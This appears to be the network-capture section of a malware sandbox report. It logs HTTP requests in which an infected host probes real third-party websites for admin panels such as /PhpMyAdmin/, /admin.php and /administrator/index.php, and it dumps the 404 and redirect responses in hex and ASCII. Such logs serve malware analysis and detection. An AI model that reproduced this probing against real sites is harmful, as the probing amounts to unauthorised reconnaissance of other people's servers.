                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                164192.168.2.657662188.120.236.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.995738983 CET226OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.203089952 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.203100920 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                165192.168.2.657667188.120.236.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.010802031 CET224OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.230437040 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.230448961 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                166192.168.2.65781366.115.173.18880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.018161058 CET252OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.711625099 CET639INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                set-cookie: PHPSESSID=178c8119ea482728a830be8f8316be27; path=/
                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                location: http://conceptualintegration.com
                                                                                                                                                                                                                                                                                                                x-litespeed-cache-control: public,max-age=3600
                                                                                                                                                                                                                                                                                                                x-litespeed-tag: ab2_HTTP.404,ab2_404,ab2_URL.8c4d59553f196c31addbce524a37cdb6,ab2_guest,ab2_
                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                date: Sat, 02 Dec 2023 01:09:32 GMT
                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                vary: User-Agent
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.712307930 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=178c8119ea482728a830be8f8316be27
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.074924946 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=178c8119ea482728a830be8f8316be27
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.465543032 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=178c8119ea482728a830be8f8316be27
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:34.075099945 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=178c8119ea482728a830be8f8316be27
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:35.278692007 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=178c8119ea482728a830be8f8316be27
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.575221062 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=178c8119ea482728a830be8f8316be27
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:37.778816938 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=178c8119ea482728a830be8f8316be27
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:40.204910994 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=178c8119ea482728a830be8f8316be27
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:45.012262106 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=178c8119ea482728a830be8f8316be27
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                167192.168.2.65781666.115.173.18880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.022521019 CET252OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.711607933 CET521INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                set-cookie: PHPSESSID=6530a3599e222b6309996aa926711913; path=/
                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                location: http://conceptualintegration.com
                                                                                                                                                                                                                                                                                                                x-litespeed-cache: miss
                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                date: Sat, 02 Dec 2023 01:09:32 GMT
                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                vary: User-Agent
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.712163925 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=6530a3599e222b6309996aa926711913
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.074856997 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=6530a3599e222b6309996aa926711913
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:33.465544939 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=6530a3599e222b6309996aa926711913
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:34.075017929 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=6530a3599e222b6309996aa926711913
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:35.278094053 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=6530a3599e222b6309996aa926711913
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:36.575202942 CET281OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=6530a3599e222b6309996aa926711913
